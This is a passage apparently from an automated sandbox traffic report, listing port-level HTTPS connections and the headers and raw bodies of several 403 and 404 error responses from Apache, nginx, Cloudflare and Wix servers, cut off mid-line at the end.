              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6714
              Source: unknownNetwork traffic detected: HTTP traffic on port 65090 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 19659 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 57493 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 16177 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6707
              Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6709
              Source: unknownNetwork traffic detected: HTTP traffic on port 20144 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 17021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6701
              Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6703
              Source: unknownNetwork traffic detected: HTTP traffic on port 8691 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 21061 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 9017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6761
              Source: unknownNetwork traffic detected: HTTP traffic on port 16104 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 17069 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 13944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 30392 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 12968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6764
              Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6767
              Source: unknownNetwork traffic detected: HTTP traffic on port 28569 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54491 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6769
              Source: unknownNetwork traffic detected: HTTP traffic on port 8666 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6750
              Source: unknownNetwork traffic detected: HTTP traffic on port 20119 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 46869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6753
              Source: unknownNetwork traffic detected: HTTP traffic on port 57527 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6756
              Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 7701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6758
              Source: unknownNetwork traffic detected: HTTP traffic on port 39215 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 10317 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6749
              Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6741
              Source: unknownNetwork traffic detected: HTTP traffic on port 16946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6747
              Source: unknownNetwork traffic detected: HTTP traffic on port 23758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 2831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 3796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 31380 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36191 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 27604 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6739
              Source: unknownNetwork traffic detected: HTTP traffic on port 18755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6731
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:23 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5702Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3vQV2Rl%2F3jF7zpynd%2FdJKXFSgbRNyDCsmnjMwTSYdyGm1%2Bxf4mTO8pE8qtXVDGgiZOip%2BkL6oIQaHY4x6bT2l6RWbYLgbxGqkDIlPuAKTsNTpLPaS4WFAayK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75d80cc44325-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5723Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oWtG%2Bpqcn8dJydijs0UB%2Fitc8JDZyljbnp%2F2kyx4m6BL9%2BL9QjxJrjZiqRsmxE2zLUZ3sOiTL61le7muwSiUMfbUh8tAJML9yfEcGpxB8ioQwXRna%2B9RqndC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e763d9f1c41e7-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:42 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:42 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:18 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 5680Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GOo4sRMkSkwboLarPadmqJAcp5wK%2FtwIDF72RJiLEq%2FYHDigWT%2FwJNGsPNr2LJFXb8Qk%2FzrmK4fvhW7FpcnxoEdvRFYfG6ZCOPIGZfdk7ni2vIN8vZFZwTUe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e77304fb0c359-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:19 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy: report-uri https://techtrans.deX-Frame-Options: SAMEORIGINPermissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*Upgrade: h2,h2cConnection: Upgrade, closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Headers: Content-Type, AuthorizationX-Content-Security-Policy: img-src *; media-src * data:;X-Permitted-Cross-Domain-Policies: noneTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1694755564.62276521329132118844X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 15 Sep 2023 05:26:04 GMTX-Served-By: cache-iad-kjyo7100115-IADX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLg+F4RAy97FgBhKEMuS3Uv0cm7On4dir39PTYYK13tG9Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:04 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:26:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CnzwOMdPjFvH%2BN%2Bq3rvtBCHV4YB176jJ%2By81GlUotjmSQ2I5K0IghcurTQWg2uo2F%2B4p1U8esh2fpVuIvEFluAtyAQH0mYPtV4BMpTNJGXKXXXhJiJmSC3BP%2FtzYfxdK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e73e7dde2c411-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Con
